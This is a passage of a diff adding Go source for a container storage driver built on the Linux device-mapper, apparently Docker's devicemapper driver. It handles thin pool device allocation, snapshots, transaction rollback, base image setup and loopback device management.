+	devices.NextDeviceID = (devices.NextDeviceID + 1) & maxDeviceID
+}
+
+func (devices *DeviceSet) getNextFreeDeviceID() (int, error) {
+	devices.incNextDeviceID()
+	for i := 0; i <= maxDeviceID; i++ {
+		if devices.isDeviceIDFree(devices.NextDeviceID) {
+			devices.markDeviceIDUsed(devices.NextDeviceID)
+			return devices.NextDeviceID, nil
+		}
+		devices.incNextDeviceID()
+	}
+
+	return 0, fmt.Errorf("devmapper: Unable to find a free device ID")
+}
+
+func (devices *DeviceSet) poolHasFreeSpace() error {
+	if devices.minFreeSpacePercent == 0 {
+		return nil
+	}
+
+	_, _, dataUsed, dataTotal, metadataUsed, metadataTotal, err := devices.poolStatus()
+	if err != nil {
+		return err
+	}
+
+	minFreeData := (dataTotal * uint64(devices.minFreeSpacePercent)) / 100
+	if minFreeData < 1 {
+		minFreeData = 1
+	}
+	dataFree := dataTotal - dataUsed
+	if dataFree < minFreeData {
+		return fmt.Errorf("devmapper: Thin Pool has %v free data blocks which is less than minimum required %v free data blocks. Create more free space in thin pool or use dm.min_free_space option to change behavior", (dataTotal - dataUsed), minFreeData)
+	}
+
+	minFreeMetadata := (metadataTotal * uint64(devices.minFreeSpacePercent)) / 100
+	if minFreeMetadata < 1 {
+		minFreeMetadata = 1
+	}
+
+	metadataFree := metadataTotal - metadataUsed
+	if metadataFree < minFreeMetadata {
+		return fmt.Errorf("devmapper: Thin Pool has %v free metadata blocks which is less than minimum required %v free metadata blocks. Create more free metadata space in thin pool or use dm.min_free_space option to change behavior", (metadataTotal - metadataUsed), minFreeMetadata)
+	}
+
+	return nil
+}
+
+func (devices *DeviceSet) createRegisterDevice(hash string) (*devInfo, error) {
+	devices.Lock()
+	defer devices.Unlock()
+
+	deviceID, err := devices.getNextFreeDeviceID()
+	if err != nil {
+		return nil, err
+	}
+
+	if err := devices.openTransaction(hash, deviceID); err != nil {
+		logrus.Debugf("devmapper: Error opening transaction hash = %s deviceID = %d", hash, deviceID)
+		devices.markDeviceIDFree(deviceID)
+		return nil, err
+	}
+
+	for {
+		if err := devicemapper.CreateDevice(devices.getPoolDevName(), deviceID); err != nil {
+			if devicemapper.DeviceIDExists(err) {
+				// Device ID already exists. This should not
+				// happen. Now we have a mechanism to find
+				// a free device ID. So something is not right.
+				// Give a warning and continue.
+				logrus.Errorf("devmapper: Device ID %d exists in pool but it is supposed to be unused", deviceID)
+				deviceID, err = devices.getNextFreeDeviceID()
+				if err != nil {
+					return nil, err
+				}
+				// Save new device id into transaction
+				devices.refreshTransaction(deviceID)
+				continue
+			}
+			logrus.Debugf("devmapper: Error creating device: %s", err)
+			devices.markDeviceIDFree(deviceID)
+			return nil, err
+		}
+		break
+	}
+
+	logrus.Debugf("devmapper: Registering device (id %v) with FS size %v", deviceID, devices.baseFsSize)
+	info, err := devices.registerDevice(deviceID, hash, devices.baseFsSize, devices.OpenTransactionID)
+	if err != nil {
+		_ = devicemapper.DeleteDevice(devices.getPoolDevName(), deviceID)
+		devices.markDeviceIDFree(deviceID)
+		return nil, err
+	}
+
+	if err := devices.closeTransaction(); err != nil {
+		devices.unregisterDevice(deviceID, hash)
+		devicemapper.DeleteDevice(devices.getPoolDevName(), deviceID)
+		devices.markDeviceIDFree(deviceID)
+		return nil, err
+	}
+	return info, nil
+}
+
+func (devices *DeviceSet) takeSnapshot(hash string, baseInfo *devInfo, size uint64) error {
+	var (
+		devinfo *devicemapper.Info
+		err     error
+	)
+
+	if err = devices.poolHasFreeSpace(); err != nil {
+		return err
+	}
+
+	if devices.deferredRemove {
+		devinfo, err = devicemapper.GetInfoWithDeferred(baseInfo.Name())
+		if err != nil {
+			return err
+		}
+		if devinfo != nil && devinfo.DeferredRemove != 0 {
+			err = devices.cancelDeferredRemoval(baseInfo)
+			if err != nil {
+				// If Error is ErrEnxio. Device is probably already gone. Continue.
+				if err != devicemapper.ErrEnxio {
+					return err
+				}
+			} else {
+				defer devices.deactivateDevice(baseInfo)
+			}
+		}
+	} else {
+		devinfo, err = devicemapper.GetInfo(baseInfo.Name())
+		if err != nil {
+			return err
+		}
+	}
+
+	doSuspend := devinfo != nil && devinfo.Exists != 0
+
+	if doSuspend {
+		if err = devicemapper.SuspendDevice(baseInfo.Name()); err != nil {
+			return err
+		}
+		defer devicemapper.ResumeDevice(baseInfo.Name())
+	}
+
+	if err = devices.createRegisterSnapDevice(hash, baseInfo, size); err != nil {
+		return err
+	}
+
+	return nil
+}
+
+func (devices *DeviceSet) createRegisterSnapDevice(hash string, baseInfo *devInfo, size uint64) error {
+	deviceID, err := devices.getNextFreeDeviceID()
+	if err != nil {
+		return err
+	}
+
+	if err := devices.openTransaction(hash, deviceID); err != nil {
+		logrus.Debugf("devmapper: Error opening transaction hash = %s deviceID = %d", hash, deviceID)
+		devices.markDeviceIDFree(deviceID)
+		return err
+	}
+
+	for {
+		if err := devicemapper.CreateSnapDeviceRaw(devices.getPoolDevName(), deviceID, baseInfo.DeviceID); err != nil {
+			if devicemapper.DeviceIDExists(err) {
+				// Device ID already exists. This should not
+				// happen. Now we have a mechanism to find
+				// a free device ID. So something is not right.
+				// Give a warning and continue.
+				logrus.Errorf("devmapper: Device ID %d exists in pool but it is supposed to be unused", deviceID)
+				deviceID, err = devices.getNextFreeDeviceID()
+				if err != nil {
+					return err
+				}
+				// Save new device id into transaction
+				devices.refreshTransaction(deviceID)
+				continue
+			}
+			logrus.Debugf("devmapper: Error creating snap device: %s", err)
+			devices.markDeviceIDFree(deviceID)
+			return err
+		}
+		break
+	}
+
+	if _, err := devices.registerDevice(deviceID, hash, size, devices.OpenTransactionID); err != nil {
+		devicemapper.DeleteDevice(devices.getPoolDevName(), deviceID)
+		devices.markDeviceIDFree(deviceID)
+		logrus.Debugf("devmapper: Error registering device: %s", err)
+		return err
+	}
+
+	if err := devices.closeTransaction(); err != nil {
+		devices.unregisterDevice(deviceID, hash)
+		devicemapper.DeleteDevice(devices.getPoolDevName(), deviceID)
+		devices.markDeviceIDFree(deviceID)
+		return err
+	}
+	return nil
+}
+
+func (devices *DeviceSet) loadMetadata(hash string) *devInfo {
+	info := &devInfo{Hash: hash, devices: devices}
+
+	jsonData, err := ioutil.ReadFile(devices.metadataFile(info))
+	if err != nil {
+		logrus.Debugf("devmapper: Failed to read %s with err: %v", devices.metadataFile(info), err)
+		return nil
+	}
+
+	if err := json.Unmarshal(jsonData, &info); err != nil {
+		logrus.Debugf("devmapper: Failed to unmarshal devInfo from %s with err: %v", devices.metadataFile(info), err)
+		return nil
+	}
+
+	if info.DeviceID > maxDeviceID {
+		logrus.Errorf("devmapper: Ignoring Invalid DeviceId=%d", info.DeviceID)
+		return nil
+	}
+
+	return info
+}
+
+func getDeviceUUID(device string) (string, error) {
+	out, err := exec.Command("blkid", "-s", "UUID", "-o", "value", device).Output()
+	if err != nil {
+		return "", fmt.Errorf("devmapper: Failed to find uuid for device %s:%v", device, err)
+	}
+
+	uuid := strings.TrimSuffix(string(out), "\n")
+	uuid = strings.TrimSpace(uuid)
+	logrus.Debugf("devmapper: UUID for device: %s is:%s", device, uuid)
+	return uuid, nil
+}
+
+func (devices *DeviceSet) getBaseDeviceSize() uint64 {
+	info, _ := devices.lookupDevice("")
+	if info == nil {
+		return 0
+	}
+	return info.Size
+}
+
+func (devices *DeviceSet) getBaseDeviceFS() string {
+	return devices.BaseDeviceFilesystem
+}
+
+func (devices *DeviceSet) verifyBaseDeviceUUIDFS(baseInfo *devInfo) error {
+	devices.Lock()
+	defer devices.Unlock()
+
+	if err := devices.activateDeviceIfNeeded(baseInfo, false); err != nil {
+		return err
+	}
+	defer devices.deactivateDevice(baseInfo)
+
+	uuid, err := getDeviceUUID(baseInfo.DevName())
+	if err != nil {
+		return err
+	}
+
+	if devices.BaseDeviceUUID != uuid {
+		return fmt.Errorf("devmapper: Current Base Device UUID:%s does not match with stored UUID:%s. Possibly using a different thin pool than last invocation", uuid, devices.BaseDeviceUUID)
+	}
+
+	if devices.BaseDeviceFilesystem == "" {
+		fsType, err := ProbeFsType(baseInfo.DevName())
+		if err != nil {
+			return err
+		}
+		if err := devices.saveBaseDeviceFilesystem(fsType); err != nil {
+			return err
+		}
+	}
+
+	// If user specified a filesystem using dm.fs option and current
+	// file system of base image is not same, warn user that dm.fs
+	// will be ignored.
+	if devices.BaseDeviceFilesystem != devices.filesystem {
+		logrus.Warnf("devmapper: Base device already exists and has filesystem %s on it. User specified filesystem %s will be ignored.", devices.BaseDeviceFilesystem, devices.filesystem)
+		devices.filesystem = devices.BaseDeviceFilesystem
+	}
+	return nil
+}
+
+func (devices *DeviceSet) saveBaseDeviceFilesystem(fs string) error {
+	devices.BaseDeviceFilesystem = fs
+	return devices.saveDeviceSetMetaData()
+}
+
+func (devices *DeviceSet) saveBaseDeviceUUID(baseInfo *devInfo) error {
+	devices.Lock()
+	defer devices.Unlock()
+
+	if err := devices.activateDeviceIfNeeded(baseInfo, false); err != nil {
+		return err
+	}
+	defer devices.deactivateDevice(baseInfo)
+
+	uuid, err := getDeviceUUID(baseInfo.DevName())
+	if err != nil {
+		return err
+	}
+
+	devices.BaseDeviceUUID = uuid
+	return devices.saveDeviceSetMetaData()
+}
+
+func (devices *DeviceSet) createBaseImage() error {
+	logrus.Debug("devmapper: Initializing base device-mapper thin volume")
+
+	// Create initial device
+	info, err := devices.createRegisterDevice("")
+	if err != nil {
+		return err
+	}
+
+	logrus.Debug("devmapper: Creating filesystem on base device-mapper thin volume")
+
+	if err := devices.activateDeviceIfNeeded(info, false); err != nil {
+		return err
+	}
+
+	if err := devices.createFilesystem(info); err != nil {
+		return err
+	}
+
+	info.Initialized = true
+	if err := devices.saveMetadata(info); err != nil {
+		info.Initialized = false
+		return err
+	}
+
+	if err := devices.saveBaseDeviceUUID(info); err != nil {
+		return fmt.Errorf("devmapper: Could not query and save base device UUID:%v", err)
+	}
+
+	return nil
+}
+
+// Returns if thin pool device exists or not. If device exists, also makes
+// sure it is a thin pool device and not some other type of device.
+func (devices *DeviceSet) thinPoolExists(thinPoolDevice string) (bool, error) {
+	logrus.Debugf("devmapper: Checking for existence of the pool %s", thinPoolDevice)
+
+	info, err := devicemapper.GetInfo(thinPoolDevice)
+	if err != nil {
+		return false, fmt.Errorf("devmapper: GetInfo() on device %s failed: %v", thinPoolDevice, err)
+	}
+
+	// Device does not exist.
+	if info.Exists == 0 {
+		return false, nil
+	}
+
+	_, _, deviceType, _, err := devicemapper.GetStatus(thinPoolDevice)
+	if err != nil {
+		return false, fmt.Errorf("devmapper: GetStatus() on device %s failed: %v", thinPoolDevice, err)
+	}
+
+	if deviceType != "thin-pool" {
+		return false, fmt.Errorf("devmapper: Device %s is not a thin pool", thinPoolDevice)
+	}
+
+	return true, nil
+}
+
+func (devices *DeviceSet) checkThinPool() error {
+	_, transactionID, dataUsed, _, _, _, err := devices.poolStatus()
+	if err != nil {
+		return err
+	}
+	if dataUsed != 0 {
+		return fmt.Errorf("devmapper: Unable to take ownership of thin-pool (%s) that already has used data blocks",
+			devices.thinPoolDevice)
+	}
+	if transactionID != 0 {
+		return fmt.Errorf("devmapper: Unable to take ownership of thin-pool (%s) with non-zero transaction ID",
+			devices.thinPoolDevice)
+	}
+	return nil
+}
+
+// Base image is initialized properly. Either save UUID for first time (for
+// upgrade case or verify UUID.
+func (devices *DeviceSet) setupVerifyBaseImageUUIDFS(baseInfo *devInfo) error {
+	// If BaseDeviceUUID is nil (upgrade case), save it and return success.
+	if devices.BaseDeviceUUID == "" {
+		if err := devices.saveBaseDeviceUUID(baseInfo); err != nil {
+			return fmt.Errorf("devmapper: Could not query and save base device UUID:%v", err)
+		}
+		return nil
+	}
+
+	if err := devices.verifyBaseDeviceUUIDFS(baseInfo); err != nil {
+		return fmt.Errorf("devmapper: Base Device UUID and Filesystem verification failed: %v", err)
+	}
+
+	return nil
+}
+
+func (devices *DeviceSet) checkGrowBaseDeviceFS(info *devInfo) error {
+
+	if !userBaseSize {
+		return nil
+	}
+
+	if devices.baseFsSize < devices.getBaseDeviceSize() {
+		return fmt.Errorf("devmapper: Base device size cannot be smaller than %s", units.HumanSize(float64(devices.getBaseDeviceSize())))
+	}
+
+	if devices.baseFsSize == devices.getBaseDeviceSize() {
+		return nil
+	}
+
+	info.lock.Lock()
+	defer info.lock.Unlock()
+
+	devices.Lock()
+	defer devices.Unlock()
+
+	info.Size = devices.baseFsSize
+
+	if err := devices.saveMetadata(info); err != nil {
+		// Try to remove unused device
+		delete(devices.Devices, info.Hash)
+		return err
+	}
+
+	return devices.growFS(info)
+}
+
+func (devices *DeviceSet) growFS(info *devInfo) error {
+	if err := devices.activateDeviceIfNeeded(info, false); err != nil {
+		return fmt.Errorf("Error activating devmapper device: %s", err)
+	}
+
+	defer devices.deactivateDevice(info)
+
+	fsMountPoint := "/run/docker/mnt"
+	if _, err := os.Stat(fsMountPoint); os.IsNotExist(err) {
+		if err := os.MkdirAll(fsMountPoint, 0700); err != nil {
+			return err
+		}
+		defer os.RemoveAll(fsMountPoint)
+	}
+
+	options := ""
+	if devices.BaseDeviceFilesystem == "xfs" {
+		// XFS needs nouuid or it can't mount filesystems with the same fs
+		options = joinMountOptions(options, "nouuid")
+	}
+	options = joinMountOptions(options, devices.mountOptions)
+
+	if err := mount.Mount(info.DevName(), fsMountPoint, devices.BaseDeviceFilesystem, options); err != nil {
+		return fmt.Errorf("Error mounting '%s' on '%s': %s", info.DevName(), fsMountPoint, err)
+	}
+
+	defer syscall.Unmount(fsMountPoint, syscall.MNT_DETACH)
+
+	switch devices.BaseDeviceFilesystem {
+	case "ext4":
+		if out, err := exec.Command("resize2fs", info.DevName()).CombinedOutput(); err != nil {
+			return fmt.Errorf("Failed to grow rootfs:%v:%s", err, string(out))
+		}
+	case "xfs":
+		if out, err := exec.Command("xfs_growfs", info.DevName()).CombinedOutput(); err != nil {
+			return fmt.Errorf("Failed to grow rootfs:%v:%s", err, string(out))
+		}
+	default:
+		return fmt.Errorf("Unsupported filesystem type %s", devices.BaseDeviceFilesystem)
+	}
+	return nil
+}
+
+func (devices *DeviceSet) setupBaseImage() error {
+	oldInfo, _ := devices.lookupDeviceWithLock("")
+
+	// base image already exists. If it is initialized properly, do UUID
+	// verification and return. Otherwise remove image and set it up
+	// fresh.
+
+	if oldInfo != nil {
+		if oldInfo.Initialized && !oldInfo.Deleted {
+			if err := devices.setupVerifyBaseImageUUIDFS(oldInfo); err != nil {
+				return err
+			}
+
+			if err := devices.checkGrowBaseDeviceFS(oldInfo); err != nil {
+				return err
+			}
+
+			return nil
+		}
+
+		logrus.Debug("devmapper: Removing uninitialized base image")
+		// If previous base device is in deferred delete state,
+		// that needs to be cleaned up first. So don't try
+		// deferred deletion.
+		if err := devices.DeleteDevice("", true); err != nil {
+			return err
+		}
+	}
+
+	// If we are setting up base image for the first time, make sure
+	// thin pool is empty.
+	if devices.thinPoolDevice != "" && oldInfo == nil {
+		if err := devices.checkThinPool(); err != nil {
+			return err
+		}
+	}
+
+	// Create new base image device
+	if err := devices.createBaseImage(); err != nil {
+		return err
+	}
+
+	return nil
+}
+
+func setCloseOnExec(name string) {
+	if fileInfos, _ := ioutil.ReadDir("/proc/self/fd"); fileInfos != nil {
+		for _, i := range fileInfos {
+			link, _ := os.Readlink(filepath.Join("/proc/self/fd", i.Name()))
+			if link == name {
+				fd, err := strconv.Atoi(i.Name())
+				if err == nil {
+					syscall.CloseOnExec(fd)
+				}
+			}
+		}
+	}
+}
+
+// DMLog implements logging using DevMapperLogger interface.
+func (devices *DeviceSet) DMLog(level int, file string, line int, dmError int, message string) {
+	// By default libdm sends us all the messages including debug ones.
+	// We need to filter out messages here and figure out which one
+	// should be printed.
+	if level > logLevel {
+		return
+	}
+
+	// FIXME(vbatts) push this back into ./pkg/devicemapper/
+	if level <= devicemapper.LogLevelErr {
+		logrus.Errorf("libdevmapper(%d): %s:%d (%d) %s", level, file, line, dmError, message)
+	} else if level <= devicemapper.LogLevelInfo {
+		logrus.Infof("libdevmapper(%d): %s:%d (%d) %s", level, file, line, dmError, message)
+	} else {
+		// FIXME(vbatts) push this back into ./pkg/devicemapper/
+		logrus.Debugf("libdevmapper(%d): %s:%d (%d) %s", level, file, line, dmError, message)
+	}
+}
+
+func major(device uint64) uint64 {
+	return (device >> 8) & 0xfff
+}
+
+func minor(device uint64) uint64 {
+	return (device & 0xff) | ((device >> 12) & 0xfff00)
+}
+
+// ResizePool increases the size of the pool.
+func (devices *DeviceSet) ResizePool(size int64) error {
+	dirname := devices.loopbackDir()
+	datafilename := path.Join(dirname, "data")
+	if len(devices.dataDevice) > 0 {
+		datafilename = devices.dataDevice
+	}
+	metadatafilename := path.Join(dirname, "metadata")
+	if len(devices.metadataDevice) > 0 {
+		metadatafilename = devices.metadataDevice
+	}
+
+	datafile, err := os.OpenFile(datafilename, os.O_RDWR, 0)
+	if datafile == nil {
+		return err
+	}
+	defer datafile.Close()
+
+	fi, err := datafile.Stat()
+	if fi == nil {
+		return err
+	}
+
+	if fi.Size() > size {
+		return fmt.Errorf("devmapper: Can't shrink file")
+	}
+
+	dataloopback := loopback.FindLoopDeviceFor(datafile)
+	if dataloopback == nil {
+		return fmt.Errorf("devmapper: Unable to find loopback mount for: %s", datafilename)
+	}
+	defer dataloopback.Close()
+
+	metadatafile, err := os.OpenFile(metadatafilename, os.O_RDWR, 0)
+	if metadatafile == nil {
+		return err
+	}
+	defer metadatafile.Close()
+
+	metadataloopback := loopback.FindLoopDeviceFor(metadatafile)
+	if metadataloopback == nil {
+		return fmt.Errorf("devmapper: Unable to find loopback mount for: %s", metadatafilename)
+	}
+	defer metadataloopback.Close()
+
+	// Grow loopback file
+	if err := datafile.Truncate(size); err != nil {
+		return fmt.Errorf("devmapper: Unable to grow loopback file: %s", err)
+	}
+
+	// Reload size for loopback device
+	if err := loopback.SetCapacity(dataloopback); err != nil {
+		return fmt.Errorf("Unable to update loopback capacity: %s", err)
+	}
+
+	// Suspend the pool
+	if err := devicemapper.SuspendDevice(devices.getPoolName()); err != nil {
+		return fmt.Errorf("devmapper: Unable to suspend pool: %s", err)
+	}
+
+	// Reload with the new block sizes
+	if err := devicemapper.ReloadPool(devices.getPoolName(), dataloopback, metadataloopback, devices.thinpBlockSize); err != nil {
+		return fmt.Errorf("devmapper: Unable to reload pool: %s", err)
+	}
+
+	// Resume the pool
+	if err := devicemapper.ResumeDevice(devices.getPoolName()); err != nil {
+		return fmt.Errorf("devmapper: Unable to resume pool: %s", err)
+	}
+
+	return nil
+}
+
+func (devices *DeviceSet) loadTransactionMetaData() error {
+	jsonData, err := ioutil.ReadFile(devices.transactionMetaFile())
+	if err != nil {
+		// There is no active transaction. This will be the case
+		// during upgrade.
+		if os.IsNotExist(err) {
+			devices.OpenTransactionID = devices.TransactionID
+			return nil
+		}
+		return err
+	}
+
+	json.Unmarshal(jsonData, &devices.transaction)
+	return nil
+}
+
+func (devices *DeviceSet) saveTransactionMetaData() error {
+	jsonData, err := json.Marshal(&devices.transaction)
+	if err != nil {
+		return fmt.Errorf("devmapper: Error encoding metadata to json: %s", err)
+	}
+
+	return devices.writeMetaFile(jsonData, devices.transactionMetaFile())
+}
+
+func (devices *DeviceSet) removeTransactionMetaData() error {
+	if err := os.RemoveAll(devices.transactionMetaFile()); err != nil {
+		return err
+	}
+	return nil
+}
+
+func (devices *DeviceSet) rollbackTransaction() error {
+	logrus.Debugf("devmapper: Rolling back open transaction: TransactionID=%d hash=%s device_id=%d", devices.OpenTransactionID, devices.DeviceIDHash, devices.DeviceID)
+
+	// A device id might have already been deleted before transaction
+	// closed. In that case this call will fail. Just leave a message
+	// in case of failure.
+	if err := devicemapper.DeleteDevice(devices.getPoolDevName(), devices.DeviceID); err != nil {
+		logrus.Errorf("devmapper: Unable to delete device: %s", err)
+	}
+
+	dinfo := &devInfo{Hash: devices.DeviceIDHash}
+	if err := devices.removeMetadata(dinfo); err != nil {
+		logrus.Errorf("devmapper: Unable to remove metadata: %s", err)
+	} else {
+		devices.markDeviceIDFree(devices.DeviceID)
+	}
+
+	if err := devices.removeTransactionMetaData(); err != nil {
+		logrus.Errorf("devmapper: Unable to remove transaction meta file %s: %s", devices.transactionMetaFile(), err)
+	}
+
+	return nil
+}
+
+func (devices *DeviceSet) processPendingTransaction() error {
+	if err := devices.loadTransactionMetaData(); err != nil {
+		return err
+	}
+
+	// If there was open transaction but pool transaction ID is same
+	// as open transaction ID, nothing to roll back.
+	if devices.TransactionID == devices.OpenTransactionID {
+		return nil
+	}
+
+	// If open transaction ID is less than pool transaction ID, something
+	// is wrong. Bail out.
+	if devices.OpenTransactionID < devices.TransactionID {
+		logrus.Errorf("devmapper: Open Transaction id %d is less than pool transaction id %d", devices.OpenTransactionID, devices.TransactionID)
+		return nil
+	}
+
+	// Pool transaction ID is not same as open transaction. There is
+	// a transaction which was not completed.
+	if err := devices.rollbackTransaction(); err != nil {
+		return fmt.Errorf("devmapper: Rolling back open transaction failed: %s", err)
+	}
+
+	devices.OpenTransactionID = devices.TransactionID
+	return nil
+}
+
+func (devices *DeviceSet) loadDeviceSetMetaData() error {
+	jsonData, err := ioutil.ReadFile(devices.deviceSetMetaFile())
+	if err != nil {
+		// For backward compatibility return success if file does
+		// not exist.
+		if os.IsNotExist(err) {
+			return nil
+		}
+		return err
+	}
+
+	return json.Unmarshal(jsonData, devices)
+}
+
+func (devices *DeviceSet) saveDeviceSetMetaData() error {
+	jsonData, err := json.Marshal(devices)
+	if err != nil {
+		return fmt.Errorf("devmapper: Error encoding metadata to json: %s", err)
+	}
+
+	return devices.writeMetaFile(jsonData, devices.deviceSetMetaFile())
+}
+
+func (devices *DeviceSet) openTransaction(hash string, DeviceID int) error {
+	devices.allocateTransactionID()
+	devices.DeviceIDHash = hash
+	devices.DeviceID = DeviceID
+	if err := devices.saveTransactionMetaData(); err != nil {
+		return fmt.Errorf("devmapper: Error saving transaction metadata: %s", err)
+	}
+	return nil
+}
+
+func (devices *DeviceSet) refreshTransaction(DeviceID int) error {
+	devices.DeviceID = DeviceID
+	if err := devices.saveTransactionMetaData(); err != nil {
+		return fmt.Errorf("devmapper: Error saving transaction metadata: %s", err)
+	}
+	return nil
+}
+
+func (devices *DeviceSet) closeTransaction() error {
+	if err := devices.updatePoolTransactionID(); err != nil {
+		logrus.Debug("devmapper: Failed to close Transaction")
+		return err
+	}
+	return nil
+}
+
+func determineDriverCapabilities(version string) error {
+	/*
+	 * Driver version 4.27.0 and greater support deferred activation
+	 * feature.
+	 */
+
+	logrus.Debugf("devicemapper: driver version is %s", version)
+
+	versionSplit := strings.Split(version, ".")
+	major, err := strconv.Atoi(versionSplit[0])
+	if err != nil {
+		return graphdriver.ErrNotSupported
+	}
+
+	if major > 4 {
+		driverDeferredRemovalSupport = true
+		return nil
+	}
+
+	if major < 4 {
+		return nil
+	}
+
+	minor, err := strconv.Atoi(versionSplit[1])
+	if err != nil {
+		return graphdriver.ErrNotSupported
+	}
+
+	/*
+	 * If major is 4 and minor is 27, then there is no need to
+	 * check for patch level as it can not be less than 0.
+	 */
+	if minor >= 27 {
+		driverDeferredRemovalSupport = true
+		return nil
+	}
+
+	return nil
+}
+
+// Determine the major and minor number of loopback device
+func getDeviceMajorMinor(file *os.File) (uint64, uint64, error) {
+	stat, err := file.Stat()
+	if err != nil {
+		return 0, 0, err
+	}
+
+	dev := stat.Sys().(*syscall.Stat_t).Rdev
+	majorNum := major(dev)
+	minorNum := minor(dev)
+
+	logrus.Debugf("devmapper: Major:Minor for device: %s is:%v:%v", file.Name(), majorNum, minorNum)
+	return majorNum, minorNum, nil
+}
+
+// Given a file which is backing file of a loop back device, find the
+// loopback device name and its major/minor number.
+func getLoopFileDeviceMajMin(filename string) (string, uint64, uint64, error) {
+	file, err := os.Open(filename)
+	if err != nil {
+		logrus.Debugf("devmapper: Failed to open file %s", filename)
+		return "", 0, 0, err
+	}
+
+	defer file.Close()
+	loopbackDevice := loopback.FindLoopDeviceFor(file)
+	if loopbackDevice == nil {
+		return "", 0, 0, fmt.Errorf("devmapper: Unable to find loopback mount for: %s", filename)
+	}
+	defer loopbackDevice.Close()
+
+	Major, Minor, err := getDeviceMajorMinor(loopbackDevice)
+	if err != nil {
+		return "", 0, 0, err
+	}
+	return loopbackDevice.Name(), Major, Minor, nil
+}
+
+// Get the major/minor numbers of thin pool data and metadata devices
+func (devices *DeviceSet) getThinPoolDataMetaMajMin() (uint64, uint64, uint64, uint64, error) {
+	var params, poolDataMajMin, poolMetadataMajMin string
+
+	_, _, _, params, err := devicemapper.GetTable(devices.getPoolName())
+	if err != nil {
+		return 0, 0, 0, 0, err
+	}
+
+	if _, err = fmt.Sscanf(params, "%s %s", &poolMetadataMajMin, &poolDataMajMin); err != nil {
+		return 0, 0, 0, 0, err
+	}
+
+	logrus.Debugf("devmapper: poolDataMajMin=%s poolMetaMajMin=%s\n", poolDataMajMin, poolMetadataMajMin)
+
+	poolDataMajMinorSplit := strings.Split(poolDataMajMin, ":")
+	poolDataMajor, err := strconv.ParseUint(poolDataMajMinorSplit[0], 10, 32)
+	if err != nil {
+		return 0, 0, 0, 0, err
+	}
+
+	poolDataMinor, err := strconv.ParseUint(poolDataMajMinorSplit[1], 10, 32)
+	if err != nil {
+		return 0, 0, 0, 0, err
+	}
+
+	poolMetadataMajMinorSplit := strings.Split(poolMetadataMajMin, ":")
+	poolMetadataMajor, err := strconv.ParseUint(poolMetadataMajMinorSplit[0], 10, 32)
+	if err != nil {
+		return 0, 0, 0, 0, err
+	}
+
+	poolMetadataMinor, err := strconv.ParseUint(poolMetadataMajMinorSplit[1], 10, 32)
+	if err != nil {
+		return 0, 0, 0, 0, err
+	}
+
+	return poolDataMajor, poolDataMinor, poolMetadataMajor, poolMetadataMinor, nil
+}
+
+func (devices *DeviceSet) loadThinPoolLoopBackInfo() error {
+	poolDataMajor, poolDataMinor, poolMetadataMajor, poolMetadataMinor, err := devices.getThinPoolDataMetaMajMin()
+	if err != nil {
+		return err
+	}
+
+	dirname := devices.loopbackDir()
+
+	// data device has not been passed in. So there should be a data file
+	// which is being mounted as loop device.
+	if devices.dataDevice == "" {
+		datafilename := path.Join(dirname, "data")
+		dataLoopDevice, dataMajor, dataMinor, err := getLoopFileDeviceMajMin(datafilename)
+		if err != nil {
+			return err
+		}
+
+		// Compare the two
+		if poolDataMajor == dataMajor && poolDataMinor == dataMinor {
+			devices.dataDevice = dataLoopDevice
+			devices.dataLoopFile = datafilename
+		}
+
+	}
+
+	// metadata device has not been passed in. So there should be a
+	// metadata file which is being mounted as loop device.
+	if devices.metadataDevice == "" {
+		metadatafilename := path.Join(dirname, "metadata")
+		metadataLoopDevice, metadataMajor, metadataMinor, err := getLoopFileDeviceMajMin(metadatafilename)
+		if err != nil {
+			return err
+		}
+		if poolMetadataMajor == metadataMajor && poolMetadataMinor == metadataMinor {
+			devices.metadataDevice = metadataLoopDevice
+			devices.metadataLoopFile = metadatafilename
+		}
+	}
+
+	return nil
+}
+
+func (devices *DeviceSet) enableDeferredRemovalDeletion() error {
+
+	// If user asked for deferred removal then check both libdm library
+	// and kernel driver support deferred removal otherwise error out.
+	if enableDeferredRemoval {
+		if !driverDeferredRemovalSupport {
+			return fmt.Errorf("devmapper: Deferred removal can not be enabled as kernel does not support it")
+		}
+		if !devicemapper.LibraryDeferredRemovalSupport {
+			return fmt.Errorf("devmapper: Deferred removal can not be enabled as libdm does not support it")
+		}
+		logrus.Debug("devmapper: Deferred removal support enabled.")
+		devices.deferredRemove = true
+	}
+
+	if enableDeferredDeletion {
+		if !devices.deferredRemove {
+			return fmt.Errorf("devmapper: Deferred deletion can not be enabled as deferred removal is not enabled. Enable deferred removal using --storage-opt dm.use_deferred_removal=true parameter")
+		}
+		logrus.Debug("devmapper: Deferred deletion support enabled.")
+		devices.deferredDelete = true
+	}
+	return nil
+}
+
+func (devices *DeviceSet) initDevmapper(doInit bool) error {
+	// give ourselves to libdm as a log handler
+	devicemapper.LogInit(devices)
+
+	version, err := devicemapper.GetDriverVersion()
+	if err != nil {
+		// Can't even get driver version, assume not supported
+		return graphdriver.ErrNotSupported
+	}
+
+	if err := determineDriverCapabilities(version); err != nil {
+		return graphdriver.ErrNotSupported
+	}
+
+	if err := devices.enableDeferredRemovalDeletion(); err != nil {
+		return err
+	}
+
+	// https://github.com/docker/docker/issues/4036
+	if supported := devicemapper.UdevSetSyncSupport(true); !supported {
+		if dockerversion.IAmStatic == "true" {
+			logrus.Error("devmapper: Udev sync is not supported. This will lead to data loss and unexpected behavior. Install a dynamic binary to use devicemapper or select a different storage driver. For more information, see https://docs.docker.com/engine/reference/commandline/daemon/#daemon-storage-driver-option")
+		} else {
+			logrus.Error("devmapper: Udev sync is not supported. This will lead to data loss and unexpected behavior. Install a more recent version of libdevmapper or select a different storage driver. For more information, see https://docs.docker.com/engine/reference/commandline/daemon/#daemon-storage-driver-option")
+		}
+
+		if !devices.overrideUdevSyncCheck {
+			return graphdriver.ErrNotSupported
+		}
+	}
+
+	//create the root dir of the devmapper driver ownership to match this
+	//daemon's remapped root uid/gid so containers can start properly
+	uid, gid, err := idtools.GetRootUIDGID(devices.uidMaps, devices.gidMaps)
+	if err != nil {
+		return err
+	}
+	if err := idtools.MkdirAs(devices.root, 0700, uid, gid); err != nil && !os.IsExist(err) {
+		return err
+	}
+	if err := os.MkdirAll(devices.metadataDir(), 0700); err != nil && !os.IsExist(err) {
+		return err
+	}
+
+	// Set the device prefix from the device id and inode of the docker root dir
+
+	st, err := os.Stat(devices.root)
+	if err != nil {
+		return fmt.Errorf("devmapper: Error looking up dir %s: %s", devices.root, err)
+	}
+	sysSt := st.Sys().(*syscall.Stat_t)
+	// "reg-" stands for "regular file".
